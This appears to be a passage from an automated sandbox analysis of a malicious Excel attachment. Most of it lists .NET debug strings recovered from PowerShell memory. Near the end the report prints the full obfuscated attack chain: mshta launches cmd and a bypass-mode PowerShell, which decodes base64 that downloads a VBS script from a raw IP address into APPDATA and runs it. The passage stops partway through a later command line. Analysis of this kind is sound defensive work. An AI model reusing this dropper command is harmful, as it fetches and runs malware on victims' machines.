                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdbhPB source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: A7130000.0.drInitial sample: OLE indicators vbamacros = False
                  Source: PO_304234.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  PowerShell case anomaly found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; 